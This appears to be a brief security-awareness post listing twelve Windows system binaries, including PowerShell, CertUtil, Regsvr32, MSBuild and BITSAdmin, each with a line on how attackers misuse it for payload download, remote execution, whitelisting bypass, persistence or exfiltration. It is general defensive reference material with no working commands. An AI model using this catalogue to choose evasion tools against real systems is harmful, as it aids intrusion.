12 Most Exploited #LOLBins Employed by Attackers

✅ #Powershell: Widely exploited for executing malicious scripts, downloading payloads, and establishing persistent backdoors due to its extensive capabilities.

✅ #MSHTA.exe: Used to execute malicious HTML applications, allowing attackers to run scripts from remote locations.

✅ #WMIC.exe: Abused for executing system commands and scripts remotely, aiding in lateral movement and information gathering.

✅ #Rundll32.exe: Utilized to run malicious DLL files, enabling code execution under the guise of a legitimate process.

✅ #Regsvr32.exe: Exploited to execute scripts and code via Script Let files, bypassing application whitelisting defenses.

✅ #CertUtil.exe: Misused for downloading and decoding malicious payloads, often employed in data exfiltration.

✅ #Msiexec.exe: Leveraged to install malicious MSI packages from remote servers, facilitating the deployment of malware.

✅ #BITSAdmin.exe: Used to create download or upload jobs, helping attackers transfer files stealthily.

✅ #InstallUtil.exe: Abused to execute arbitrary code during the installation of .NET applications without writing files to disk.

✅ #MSBuild.exe: Exploited to compile and execute malicious code directly from XML project files.

✅ #At.exe/ Schtasks.exe: Misused for scheduling tasks to run malware at specific times or system events.

✅ #Explorer.exe: Leveraged by attackers to run malicious code by injecting it into the explorer process or hijacking DLLs it loads.

More resources:

1. https://lnkd.in/g3Sa6mn

2. https://attack.mitre.org/

3. https://lnkd.in/dftvmyDz